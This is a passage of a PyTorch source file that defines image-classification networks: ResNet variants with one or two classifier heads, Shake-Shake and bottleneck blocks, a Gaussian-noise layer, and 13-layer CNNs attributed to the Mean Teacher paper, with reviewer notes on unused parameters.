    NOTE(review): ``isL2`` is stored and ``sobel`` accepted but neither is
    used anywhere in this class -- confirm whether they were meant to
    mirror the ``CNN`` class below.
    """

    def __init__(self, block, layers, channels, groups=1, num_classes=1000,
                 downsample='basic', isL2=False, sobel=False):
        super().__init__()
        assert len(layers) == 4
        self.isL2 = isL2
        self.downsample_mode = downsample
        self.inplanes = 64
        # Standard ResNet stem: 7x7/2 conv + BN + ReLU + 3x3/2 max-pool.
        self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2,
                               padding=3, bias=False)
        self.bn1 = nn.BatchNorm2d(self.inplanes)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        # Four stages; channel width doubles while resolution halves.
        self.layer1 = self._make_layer(block, channels, groups, layers[0])
        self.layer2 = self._make_layer(
            block, channels * 2, groups, layers[1], stride=2)
        self.layer3 = self._make_layer(
            block, channels * 4, groups, layers[2], stride=2)
        self.layer4 = self._make_layer(
            block, channels * 8, groups, layers[3], stride=2)
        self.avgpool = nn.AvgPool2d(7)
        # Two independent classifier heads on the pooled features.
        self.fc1 = nn.Linear(block.out_channels(
            channels * 8, groups), num_classes)
        self.fc2 = nn.Linear(block.out_channels(
            channels * 8, groups), num_classes)

        # He initialization for convs; BatchNorm starts as identity.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / n))
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()

    def _make_layer(self, block, planes, groups, blocks, stride=1):
        """Stack ``blocks`` residual blocks, projecting the shortcut if needed."""
        downsample = None
        if stride != 1 or self.inplanes != block.out_channels(planes, groups):
            if self.downsample_mode == 'basic' or stride == 1:
                # 1x1 strided conv + BN shortcut projection.
                downsample = nn.Sequential(
                    nn.Conv2d(self.inplanes, block.out_channels(planes, groups),
                              kernel_size=1, stride=stride, bias=False),
                    nn.BatchNorm2d(block.out_channels(planes, groups)),
                )
            elif self.downsample_mode == 'shift_conv':
                downsample = ShiftConvDownsample(
                    in_channels=self.inplanes,
                    out_channels=block.out_channels(planes, groups))
            else:
                assert False
        layers = []
        layers.append(block(self.inplanes, planes, groups, stride, downsample))
        self.inplanes = block.out_channels(planes, groups)
        for i in range(1, blocks):
            layers.append(block(self.inplanes, planes, groups))
        return nn.Sequential(*layers)

    def forward(self, x):
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)
        x = self.avgpool(x)
        x = x.view(x.size(0), -1)  # flatten to (batch, features)
        return self.fc1(x), self.fc2(x)
class ResNet32x32(nn.Module):
    """ResNet backbone for 32x32 (CIFAR-style) inputs with two FC heads.

    ``forward`` returns a pair ``(fc1(x), fc2(x))`` of logits.
    NOTE(review): the stem conv is not followed by BN/ReLU before layer1 --
    presumably because the residual blocks (e.g. ShakeShakeBlock) start with
    their own activation; confirm against the block implementations.
    """

    def __init__(self, block, layers, channels, groups=1, num_classes=1000,
                 downsample='basic'):
        super().__init__()
        assert len(layers) == 3
        self.downsample_mode = downsample
        self.inplanes = 16
        # CIFAR-style stem: a single 3x3 conv, no pooling.
        self.conv1 = nn.Conv2d(3, 16, kernel_size=3, stride=1,
                               padding=1, bias=False)
        # Three stages; channel width doubles while resolution halves.
        self.layer1 = self._make_layer(block, channels, groups, layers[0])
        self.layer2 = self._make_layer(
            block, channels * 2, groups, layers[1], stride=2)
        self.layer3 = self._make_layer(
            block, channels * 4, groups, layers[2], stride=2)
        self.avgpool = nn.AvgPool2d(8)
        # Two independent classifier heads on the pooled features.
        self.fc1 = nn.Linear(block.out_channels(
            channels * 4, groups), num_classes)
        self.fc2 = nn.Linear(block.out_channels(
            channels * 4, groups), num_classes)

        # He initialization for convs; BatchNorm starts as identity.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / n))
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()

    def _make_layer(self, block, planes, groups, blocks, stride=1):
        """Stack ``blocks`` residual blocks, projecting the shortcut if needed."""
        downsample = None
        if stride != 1 or self.inplanes != block.out_channels(planes, groups):
            if self.downsample_mode == 'basic' or stride == 1:
                # 1x1 strided conv + BN shortcut projection.
                downsample = nn.Sequential(
                    nn.Conv2d(self.inplanes, block.out_channels(planes, groups),
                              kernel_size=1, stride=stride, bias=False),
                    nn.BatchNorm2d(block.out_channels(planes, groups)),
                )
            elif self.downsample_mode == 'shift_conv':
                downsample = ShiftConvDownsample(
                    in_channels=self.inplanes,
                    out_channels=block.out_channels(planes, groups))
            else:
                assert False
        layers = []
        layers.append(block(self.inplanes, planes, groups, stride, downsample))
        self.inplanes = block.out_channels(planes, groups)
        for i in range(1, blocks):
            layers.append(block(self.inplanes, planes, groups))
        return nn.Sequential(*layers)

    def forward(self, x):
        x = self.conv1(x)
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.avgpool(x)
        x = x.view(x.size(0), -1)  # flatten to (batch, features)
        return self.fc1(x), self.fc2(x)
def conv3x3(in_planes, out_planes, stride=1):
    """Return a bias-free 3x3 convolution with 1-pixel padding."""
    return nn.Conv2d(
        in_planes,
        out_planes,
        kernel_size=3,
        stride=stride,
        padding=1,
        bias=False,
    )
class BottleneckBlock(nn.Module):
    """Bottleneck residual block: 1x1 reduce -> 3x3 (grouped) -> 1x1 expand."""

    @classmethod
    def out_channels(cls, planes, groups):
        # Grouped (ResNeXt-style) blocks expand 2x; the classic ResNet
        # bottleneck expands 4x.
        if groups > 1:
            return 2 * planes
        else:
            return 4 * planes

    def __init__(self, inplanes, planes, groups, stride=1, downsample=None):
        super().__init__()
        self.relu = nn.ReLU(inplace=True)
        self.conv_a1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
        self.bn_a1 = nn.BatchNorm2d(planes)
        # The 3x3 conv carries the stride and the (optional) group structure.
        self.conv_a2 = nn.Conv2d(
            planes, planes, kernel_size=3, stride=stride, padding=1,
            bias=False, groups=groups)
        self.bn_a2 = nn.BatchNorm2d(planes)
        self.conv_a3 = nn.Conv2d(planes, self.out_channels(
            planes, groups), kernel_size=1, bias=False)
        self.bn_a3 = nn.BatchNorm2d(self.out_channels(planes, groups))
        self.downsample = downsample  # shortcut projection, or None
        self.stride = stride

    def forward(self, x):
        a, residual = x, x
        a = self.conv_a1(a)
        a = self.bn_a1(a)
        a = self.relu(a)
        a = self.conv_a2(a)
        a = self.bn_a2(a)
        a = self.relu(a)
        a = self.conv_a3(a)
        a = self.bn_a3(a)
        # Project the shortcut when the shape changes.
        if self.downsample is not None:
            residual = self.downsample(residual)
        return self.relu(residual + a)
class ShakeShakeBlock(nn.Module):
    """Shake-Shake residual block: two parallel 3x3 branches mixed randomly."""

    @classmethod
    def out_channels(cls, planes, groups):
        assert groups == 1  # grouped convolutions are not supported here
        return planes

    def __init__(self, inplanes, planes, groups, stride=1, downsample=None):
        super().__init__()
        assert groups == 1
        # Branch a.
        self.conv_a1 = conv3x3(inplanes, planes, stride)
        self.bn_a1 = nn.BatchNorm2d(planes)
        self.conv_a2 = conv3x3(planes, planes)
        self.bn_a2 = nn.BatchNorm2d(planes)
        # Branch b (identical shape to branch a).
        self.conv_b1 = conv3x3(inplanes, planes, stride)
        self.bn_b1 = nn.BatchNorm2d(planes)
        self.conv_b2 = conv3x3(planes, planes)
        self.bn_b2 = nn.BatchNorm2d(planes)
        self.downsample = downsample  # shortcut projection, or None
        self.stride = stride

    def forward(self, x):
        a, b, residual = x, x, x

        # First ReLU is out-of-place because ``x`` is still needed by the
        # other branch and the shortcut.
        a = F.relu(a, inplace=False)
        a = self.conv_a1(a)
        a = self.bn_a1(a)
        a = F.relu(a, inplace=True)
        a = self.conv_a2(a)
        a = self.bn_a2(a)

        b = F.relu(b, inplace=False)
        b = self.conv_b1(b)
        b = self.bn_b1(b)
        b = F.relu(b, inplace=True)
        b = self.conv_b2(b)
        b = self.bn_b2(b)

        # Random convex combination of the branches (fixed 0.5 at eval time).
        ab = shake(a, b, training=self.training)

        if self.downsample is not None:
            residual = self.downsample(x)

        return residual + ab
class Shake(Function):
    """Shake-Shake gating autograd function.

    Forward mixes the two inputs with a per-sample random convex weight
    (fixed at 0.5 in eval mode); backward re-samples an independent random
    gate, which is the "shake" on the backward pass.

    NOTE(review): ``forward``/``backward`` are declared as classmethods
    rather than the staticmethods recent torch versions expect -- confirm
    this still works on the torch version this project targets.
    """

    @classmethod
    def forward(cls, ctx, inp1, inp2, training):
        assert inp1.size() == inp2.size()
        # Gate shape: one scalar per sample, broadcast over remaining dims.
        gate_size = [inp1.size()[0], *itertools.repeat(1, inp1.dim() - 1)]
        gate = inp1.new(*gate_size)
        if training:
            gate.uniform_(0, 1)
        else:
            gate.fill_(0.5)  # deterministic average at eval time
        return inp1 * gate + inp2 * (1. - gate)

    @classmethod
    def backward(cls, ctx, grad_output):
        grad_inp1 = grad_inp2 = grad_training = None
        # Fresh random gate, independent of the forward-pass one.
        gate_size = [grad_output.size()[0], *itertools.repeat(1,
                     grad_output.dim() - 1)]
        gate = Variable(grad_output.data.new(*gate_size).uniform_(0, 1))
        if ctx.needs_input_grad[0]:
            grad_inp1 = grad_output * gate
        if ctx.needs_input_grad[1]:
            grad_inp2 = grad_output * (1 - gate)
        # ``training`` is a plain bool and must never require a gradient.
        assert not ctx.needs_input_grad[2]
        return grad_inp1, grad_inp2, grad_training
def shake(inp1, inp2, training=False):
    """Functional wrapper over the ``Shake`` autograd Function."""
    return Shake.apply(inp1, inp2, training)
class ShiftConvDownsample(nn.Module):
    """Downsample via interleaved 2x2 subsampling plus a grouped 1x1 conv.

    The two diagonal sub-grids of the input are stacked along the channel
    axis (doubling the channels, halving each spatial dimension), then
    passed through ReLU, a grouped 1x1 convolution, and batch norm.
    """

    def __init__(self, in_channels, out_channels):
        super().__init__()
        self.relu = nn.ReLU(inplace=True)
        self.conv = nn.Conv2d(in_channels=2 * in_channels,
                              out_channels=out_channels,
                              kernel_size=1,
                              groups=2)
        self.bn = nn.BatchNorm2d(out_channels)

    def forward(self, x):
        even_grid = x[:, :, 0::2, 0::2]
        odd_grid = x[:, :, 1::2, 1::2]
        stacked = torch.cat((even_grid, odd_grid), dim=1)
        return self.bn(self.conv(self.relu(stacked)))
class GaussianNoise(nn.Module):
    """Additive Gaussian-noise layer.

    Adds zero-mean Gaussian noise with standard deviation ``std`` to the
    input on every forward pass (applied in train and eval mode alike).
    """

    def __init__(self, std):
        super(GaussianNoise, self).__init__()
        self.std = std  # standard deviation of the additive noise

    def forward(self, x):
        # Bug fix: the original hard-coded ``.cuda()`` (crashing on CPU-only
        # hosts) and used the obsolete Variable/torch.normal idiom.  Draw the
        # noise on the same device and dtype as the input instead.
        noise = torch.randn_like(x) * self.std
        return x + noise
from torch.nn.utils import weight_norm
# For cifar_cnn
class CNN(nn.Module):
    """
    CNN from Mean Teacher paper

    13-layer conv net with weight-normalized convolutions.  ``forward``
    returns ``(fc2(x), x)``: the second head's logits plus the 128-d
    feature vector.  NOTE(review): ``self.fc1`` and ``self.gn`` are built
    but never used in ``forward`` (see the commented-out return below) --
    confirm whether that is intentional.
    """
    def __init__(self, num_classes=10, isL2 = False, sobel = False):
        super(CNN, self).__init__()
        self.isL2 = isL2  # if True, L2-normalize the feature vector
        self.gn = GaussianNoise(0.15)
        self.activation = nn.LeakyReLU(0.1)
        # 2 input channels when fed Sobel edge maps, 3 for raw RGB.
        in_dim = 2 + int(not sobel)
        self.conv1a = weight_norm(nn.Conv2d(in_dim, 128, 3, padding=1))
        self.bn1a = nn.BatchNorm2d(128)
        self.conv1b = weight_norm(nn.Conv2d(128, 128, 3, padding=1))
        self.bn1b = nn.BatchNorm2d(128)
        self.conv1c = weight_norm(nn.Conv2d(128, 128, 3, padding=1))
        self.bn1c = nn.BatchNorm2d(128)
        self.mp1 = nn.MaxPool2d(2, stride=2, padding=0)
        self.drop1 = nn.Dropout(0.5)

        self.conv2a = weight_norm(nn.Conv2d(128, 256, 3, padding=1))
        self.bn2a = nn.BatchNorm2d(256)
        self.conv2b = weight_norm(nn.Conv2d(256, 256, 3, padding=1))
        self.bn2b = nn.BatchNorm2d(256)
        self.conv2c = weight_norm(nn.Conv2d(256, 256, 3, padding=1))
        self.bn2c = nn.BatchNorm2d(256)
        self.mp2 = nn.MaxPool2d(2, stride=2, padding=0)
        self.drop2 = nn.Dropout(0.5)

        # Final stage narrows 512 -> 256 -> 128 via 1x1 convs, then pools.
        self.conv3a = weight_norm(nn.Conv2d(256, 512, 3, padding=0))
        self.bn3a = nn.BatchNorm2d(512)
        self.conv3b = weight_norm(nn.Conv2d(512, 256, 1, padding=0))
        self.bn3b = nn.BatchNorm2d(256)
        self.conv3c = weight_norm(nn.Conv2d(256, 128, 1, padding=0))
        self.bn3c = nn.BatchNorm2d(128)
        self.ap3 = nn.AvgPool2d(6, stride=2, padding=0)

        self.fc1 = weight_norm(nn.Linear(128, num_classes))
        self.fc2 = weight_norm(nn.Linear(128, num_classes))

        if sobel:
            # Fixed (non-trainable) grayscale + Sobel edge-filter front-end.
            grayscale = nn.Conv2d(3, 1, kernel_size=1, stride=1, padding=0)
            grayscale.weight.data.fill_(1.0 / 3.0)
            grayscale.bias.data.zero_()
            sobel_filter = nn.Conv2d(1, 2, kernel_size=3, stride=1, padding=1)
            sobel_filter.weight.data[0, 0].copy_(
                torch.FloatTensor([[1, 0, -1], [2, 0, -2], [1, 0, -1]])
            )
            sobel_filter.weight.data[1, 0].copy_(
                torch.FloatTensor([[1, 2, 1], [0, 0, 0], [-1, -2, -1]])
            )
            sobel_filter.bias.data.zero_()
            self.sobel = nn.Sequential(grayscale, sobel_filter)
            for p in self.sobel.parameters():
                p.requires_grad = False
        else:
            self.sobel = None

    def forward(self, x, debug=False):
        if self.sobel:
            x = self.sobel(x)
        x = self.activation(self.bn1a(self.conv1a(x)))
        x = self.activation(self.bn1b(self.conv1b(x)))
        x = self.activation(self.bn1c(self.conv1c(x)))
        x = self.mp1(x)
        x = self.drop1(x)
        x = self.activation(self.bn2a(self.conv2a(x)))
        x = self.activation(self.bn2b(self.conv2b(x)))
        x = self.activation(self.bn2c(self.conv2c(x)))
        x = self.mp2(x)
        x = self.drop2(x)
        x = self.activation(self.bn3a(self.conv3a(x)))
        x = self.activation(self.bn3b(self.conv3b(x)))
        x = self.activation(self.bn3c(self.conv3c(x)))
        x = self.ap3(x)
        x = x.view(-1, 128)  # flatten to the 128-d feature vector
        if self.isL2:
            x = F.normalize(x)
        #return self.fc1(x), self.fc2(x), x
        return self.fc2(x), x
class CNNGauss(nn.Module):
    """
    CNN from Mean Teacher paper

    Same 13-layer trunk as ``CNN`` (RGB input only, no sobel option) but
    Gaussian input noise is applied in ``forward`` and three values are
    returned: ``(fc1(x), fc2(x), x)`` with ``x`` the 128-d feature vector.
    """
    def __init__(self, num_classes=10, isL2 = False):
        super(CNNGauss, self).__init__()
        self.isL2 = isL2  # if True, L2-normalize the feature vector
        self.gn = GaussianNoise(0.15)
        self.activation = nn.LeakyReLU(0.1)
        self.conv1a = weight_norm(nn.Conv2d(3, 128, 3, padding=1))
        self.bn1a = nn.BatchNorm2d(128)
        self.conv1b = weight_norm(nn.Conv2d(128, 128, 3, padding=1))
        self.bn1b = nn.BatchNorm2d(128)
        self.conv1c = weight_norm(nn.Conv2d(128, 128, 3, padding=1))
        self.bn1c = nn.BatchNorm2d(128)
        self.mp1 = nn.MaxPool2d(2, stride=2, padding=0)
        self.drop1 = nn.Dropout(0.5)

        self.conv2a = weight_norm(nn.Conv2d(128, 256, 3, padding=1))
        self.bn2a = nn.BatchNorm2d(256)
        self.conv2b = weight_norm(nn.Conv2d(256, 256, 3, padding=1))
        self.bn2b = nn.BatchNorm2d(256)
        self.conv2c = weight_norm(nn.Conv2d(256, 256, 3, padding=1))
        self.bn2c = nn.BatchNorm2d(256)
        self.mp2 = nn.MaxPool2d(2, stride=2, padding=0)
        self.drop2 = nn.Dropout(0.5)

        self.conv3a = weight_norm(nn.Conv2d(256, 512, 3, padding=0))
        self.bn3a = nn.BatchNorm2d(512)
        self.conv3b = weight_norm(nn.Conv2d(512, 256, 1, padding=0))
        self.bn3b = nn.BatchNorm2d(256)
        self.conv3c = weight_norm(nn.Conv2d(256, 128, 1, padding=0))
        self.bn3c = nn.BatchNorm2d(128)
        self.ap3 = nn.AvgPool2d(6, stride=2, padding=0)

        self.fc1 = weight_norm(nn.Linear(128, num_classes))
        self.fc2 = weight_norm(nn.Linear(128, num_classes))

    def forward(self, x, debug=False):
        # Gaussian noise on the input (this is what distinguishes CNNGauss).
        x = self.gn(x)
        x = self.activation(self.bn1a(self.conv1a(x)))
        x = self.activation(self.bn1b(self.conv1b(x)))
        x = self.activation(self.bn1c(self.conv1c(x)))
        x = self.mp1(x)
        x = self.drop1(x)
        x = self.activation(self.bn2a(self.conv2a(x)))
        x = self.activation(self.bn2b(self.conv2b(x)))
        x = self.activation(self.bn2c(self.conv2c(x)))
        x = self.mp2(x)
        x = self.drop2(x)
        x = self.activation(self.bn3a(self.conv3a(x)))
        x = self.activation(self.bn3b(self.conv3b(x)))
        x = self.activation(self.bn3c(self.conv3c(x)))
        x = self.ap3(x)
        x = x.view(-1, 128)  # flatten to the 128-d feature vector
        if self.isL2:
            x = F.normalize(x)
        return self.fc1(x), self.fc2(x), x
class CNNSingle(nn.Module):
    """
    CNN from Mean Teacher paper

    Single-head variant of ``CNN``: returns ``(fc1(x), x)``.
    NOTE(review): ``self.gn`` is constructed but never applied in
    ``forward`` -- confirm whether input noise was meant to be used here.
    """
    def __init__(self, num_classes=10, isL2 = False):
        super(CNNSingle, self).__init__()
        self.isL2 = isL2  # if True, L2-normalize the feature vector
        self.gn = GaussianNoise(0.15)
        self.activation = nn.LeakyReLU(0.1)
        self.conv1a = weight_norm(nn.Conv2d(3, 128, 3, padding=1))
        self.bn1a = nn.BatchNorm2d(128)
        self.conv1b = weight_norm(nn.Conv2d(128, 128, 3, padding=1))
        self.bn1b = nn.BatchNorm2d(128)
        self.conv1c = weight_norm(nn.Conv2d(128, 128, 3, padding=1))
        self.bn1c = nn.BatchNorm2d(128)
        self.mp1 = nn.MaxPool2d(2, stride=2, padding=0)
        self.drop1 = nn.Dropout(0.5)

        self.conv2a = weight_norm(nn.Conv2d(128, 256, 3, padding=1))
        self.bn2a = nn.BatchNorm2d(256)
        self.conv2b = weight_norm(nn.Conv2d(256, 256, 3, padding=1))
        self.bn2b = nn.BatchNorm2d(256)
        self.conv2c = weight_norm(nn.Conv2d(256, 256, 3, padding=1))
        self.bn2c = nn.BatchNorm2d(256)
        self.mp2 = nn.MaxPool2d(2, stride=2, padding=0)
        self.drop2 = nn.Dropout(0.5)

        self.conv3a = weight_norm(nn.Conv2d(256, 512, 3, padding=0))
        self.bn3a = nn.BatchNorm2d(512)
        self.conv3b = weight_norm(nn.Conv2d(512, 256, 1, padding=0))
        self.bn3b = nn.BatchNorm2d(256)
        self.conv3c = weight_norm(nn.Conv2d(256, 128, 1, padding=0))
        self.bn3c = nn.BatchNorm2d(128)
        self.ap3 = nn.AvgPool2d(6, stride=2, padding=0)

        # Single classifier head.
        self.fc1 = weight_norm(nn.Linear(128, num_classes))

    def forward(self, x, debug=False):
        x = self.activation(self.bn1a(self.conv1a(x)))
        x = self.activation(self.bn1b(self.conv1b(x)))
        x = self.activation(self.bn1c(self.conv1c(x)))
        x = self.mp1(x)
        x = self.drop1(x)
        x = self.activation(self.bn2a(self.conv2a(x)))
        x = self.activation(self.bn2b(self.conv2b(x)))
        x = self.activation(self.bn2c(self.conv2c(x)))
        x = self.mp2(x)
        x = self.drop2(x)
        x = self.activation(self.bn3a(self.conv3a(x)))
        x = self.activation(self.bn3b(self.conv3b(x)))
        x = self.activation(self.bn3c(self.conv3c(x)))
        x = self.ap3(x)
        # pdb.set_trace()
        x = x.view(-1, 128)  # flatten to the 128-d feature vector
        if self.isL2:
            x = F.normalize(x)
        return self.fc1(x), x
class CNNGaussSingle(nn.Module):
    """
    CNN from Mean Teacher paper

    Same 13-layer architecture as CNNSingle but with additive Gaussian input
    noise (sigma=0.15) applied at the start of forward(), and a single
    classifier head.

    num_classes: output size of the fc1 head.
    isL2: if True, the 128-d feature is L2-normalized before the head.
    """
    def __init__(self, num_classes=10, isL2 = False):
        super(CNNGaussSingle, self).__init__()
        self.isL2 = isL2
        # Input corruption (GaussianNoise is defined elsewhere in this file).
        self.gn = GaussianNoise(0.15)
        self.activation = nn.LeakyReLU(0.1)
        # Stack 1: 3 -> 128 channels.
        self.conv1a = weight_norm(nn.Conv2d(3, 128, 3, padding=1))
        self.bn1a = nn.BatchNorm2d(128)
        self.conv1b = weight_norm(nn.Conv2d(128, 128, 3, padding=1))
        self.bn1b = nn.BatchNorm2d(128)
        self.conv1c = weight_norm(nn.Conv2d(128, 128, 3, padding=1))
        self.bn1c = nn.BatchNorm2d(128)
        self.mp1 = nn.MaxPool2d(2, stride=2, padding=0)
        self.drop1 = nn.Dropout(0.5)
        # Stack 2: 128 -> 256 channels.
        self.conv2a = weight_norm(nn.Conv2d(128, 256, 3, padding=1))
        self.bn2a = nn.BatchNorm2d(256)
        self.conv2b = weight_norm(nn.Conv2d(256, 256, 3, padding=1))
        self.bn2b = nn.BatchNorm2d(256)
        self.conv2c = weight_norm(nn.Conv2d(256, 256, 3, padding=1))
        self.bn2c = nn.BatchNorm2d(256)
        self.mp2 = nn.MaxPool2d(2, stride=2, padding=0)
        self.drop2 = nn.Dropout(0.5)
        # Stack 3: widen to 512 with an unpadded 3x3, then 1x1 convs down to 128.
        self.conv3a = weight_norm(nn.Conv2d(256, 512, 3, padding=0))
        self.bn3a = nn.BatchNorm2d(512)
        self.conv3b = weight_norm(nn.Conv2d(512, 256, 1, padding=0))
        self.bn3b = nn.BatchNorm2d(256)
        self.conv3c = weight_norm(nn.Conv2d(256, 128, 1, padding=0))
        self.bn3c = nn.BatchNorm2d(128)
        # 6x6 average pool collapses the spatial map to a 128-d vector
        # (assumes 32x32 input, e.g. CIFAR — TODO confirm).
        self.ap3 = nn.AvgPool2d(6, stride=2, padding=0)
        self.fc1 = weight_norm(nn.Linear(128, num_classes))
    def forward(self, x, debug=False):
        """Return (logits, feature) where feature is the 128-d pooled vector."""
        x = self.gn(x)
        x = self.activation(self.bn1a(self.conv1a(x)))
        x = self.activation(self.bn1b(self.conv1b(x)))
        x = self.activation(self.bn1c(self.conv1c(x)))
        x = self.mp1(x)
        x = self.drop1(x)
        x = self.activation(self.bn2a(self.conv2a(x)))
        x = self.activation(self.bn2b(self.conv2b(x)))
        x = self.activation(self.bn2c(self.conv2c(x)))
        x = self.mp2(x)
        x = self.drop2(x)
        x = self.activation(self.bn3a(self.conv3a(x)))
        x = self.activation(self.bn3b(self.conv3b(x)))
        x = self.activation(self.bn3c(self.conv3c(x)))
        x = self.ap3(x)
        x = x.view(-1, 128)
        if self.isL2:
            x = F.normalize(x)
        return self.fc1(x), x
def conv3x3(in_planes, out_planes, stride=1):
    """Return a bias-free 3x3 Conv2d with unit padding (a BatchNorm follows it)."""
    conv = nn.Conv2d(
        in_planes,
        out_planes,
        kernel_size=3,
        stride=stride,
        padding=1,
        bias=False,
    )
    return conv
def conv1x1(in_planes, out_planes, stride=1):
    """Return a bias-free 1x1 Conv2d (channel projection, no padding)."""
    conv = nn.Conv2d(
        in_planes,
        out_planes,
        kernel_size=1,
        stride=stride,
        bias=False,
    )
    return conv
class BasicBlock(nn.Module):
    """ResNet basic residual block: two 3x3 convs plus an identity (or projected) skip."""

    expansion = 1

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(BasicBlock, self).__init__()
        # Any spatial downsampling happens in the first conv.
        self.conv1 = conv3x3(inplanes, planes, stride)
        self.bn1 = nn.BatchNorm2d(planes)
        self.relu = nn.ReLU(inplace=True)
        self.conv2 = conv3x3(planes, planes)
        self.bn2 = nn.BatchNorm2d(planes)
        # Optional projection applied to the skip path when shapes differ.
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        """conv->BN->ReLU->conv->BN, add the skip, then a final ReLU."""
        shortcut = x if self.downsample is None else self.downsample(x)
        y = self.relu(self.bn1(self.conv1(x)))
        y = self.bn2(self.conv2(y))
        y += shortcut
        return self.relu(y)
class Bottleneck(nn.Module):
    """ResNet bottleneck block: 1x1 reduce -> 3x3 -> 1x1 expand (x4), plus skip."""

    expansion = 4

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(Bottleneck, self).__init__()
        self.conv1 = conv1x1(inplanes, planes)
        self.bn1 = nn.BatchNorm2d(planes)
        # Spatial downsampling, if any, happens in the middle 3x3 conv.
        self.conv2 = conv3x3(planes, planes, stride)
        self.bn2 = nn.BatchNorm2d(planes)
        self.conv3 = conv1x1(planes, planes * self.expansion)
        self.bn3 = nn.BatchNorm2d(planes * self.expansion)
        self.relu = nn.ReLU(inplace=True)
        # Optional projection applied to the skip path when shapes differ.
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        """Three conv->BN stages (ReLU after the first two), add skip, final ReLU."""
        shortcut = x if self.downsample is None else self.downsample(x)
        y = self.relu(self.bn1(self.conv1(x)))
        y = self.relu(self.bn2(self.conv2(y)))
        y = self.bn3(self.conv3(y))
        y += shortcut
        return self.relu(y)
class ResNet(nn.Module):
    """Torchvision-style ResNet whose forward() returns (logits, pooled feature).

    block: residual block class (BasicBlock or Bottleneck).
    layers: sequence with the block count of each of the four stages.
    num_classes: output size of the fc head.
    isL2: if True, L2-normalize the pooled feature before the head.
    sobel: NOTE(review) accepted but never used in this class — confirm
        whether a Sobel-filter input layer was intended.
    """
    def __init__(self, block, layers, num_classes=1000, isL2 = False, sobel = False):
        # Running channel count consumed/updated by _make_layer.
        self.inplanes = 64
        self.isL2 = isL2
        super(ResNet, self).__init__()
        # Stem: 7x7 stride-2 conv + BN + ReLU + stride-2 max-pool.
        self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
                               bias=False)
        self.bn1 = nn.BatchNorm2d(64)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        # Four residual stages; stages 2-4 halve the spatial resolution.
        self.layer1 = self._make_layer(block, 64, layers[0])
        self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
        self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
        self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
        self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
        self.fc = nn.Linear(512 * block.expansion, num_classes)
        # He initialization for convs; BN starts as identity (weight=1, bias=0).
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
            elif isinstance(m, nn.BatchNorm2d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
    def _make_layer(self, block, planes, blocks, stride=1):
        """Stack `blocks` residual blocks; only the first may stride/project the skip."""
        downsample = None
        # Project the identity path when stride or channel count changes.
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(
                conv1x1(self.inplanes, planes * block.expansion, stride),
                nn.BatchNorm2d(planes * block.expansion),
            )
        layers = []
        layers.append(block(self.inplanes, planes, stride, downsample))
        self.inplanes = planes * block.expansion
        for _ in range(1, blocks):
            layers.append(block(self.inplanes, planes))
        return nn.Sequential(*layers)
    def forward(self, x):
        """Return (logits, feature); feature is the flattened pooled activation."""
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)
        x = self.avgpool(x)
        x = x.view(x.size(0), -1)
        if self.isL2:
            x = F.normalize(x)
        c = self.fc(x)
        return c , x
class ResNetDouble(nn.Module):
    """ResNet variant with TWO classifier heads over the same pooled feature.

    forward() returns (fc logits, fc2 logits, pooled feature).

    block: residual block class (BasicBlock or Bottleneck).
    layers: sequence with the block count of each of the four stages.
    num_classes: output size of both heads.
    isL2: if True, L2-normalize the pooled feature before the heads.
    """
    def __init__(self, block, layers, num_classes=1000, isL2 = False):
        # Running channel count consumed/updated by _make_layer.
        self.inplanes = 64
        self.isL2 = isL2
        super(ResNetDouble, self).__init__()
        # Stem: 7x7 stride-2 conv + BN + ReLU + stride-2 max-pool.
        self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
                               bias=False)
        self.bn1 = nn.BatchNorm2d(64)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        # Four residual stages; stages 2-4 halve the spatial resolution.
        self.layer1 = self._make_layer(block, 64, layers[0])
        self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
        self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
        self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
        self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
        # Two parallel heads over the same feature.
        self.fc = nn.Linear(512 * block.expansion, num_classes)
        self.fc2 = nn.Linear(512 * block.expansion, num_classes)
        # He initialization for convs; BN starts as identity (weight=1, bias=0).
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
            elif isinstance(m, nn.BatchNorm2d):
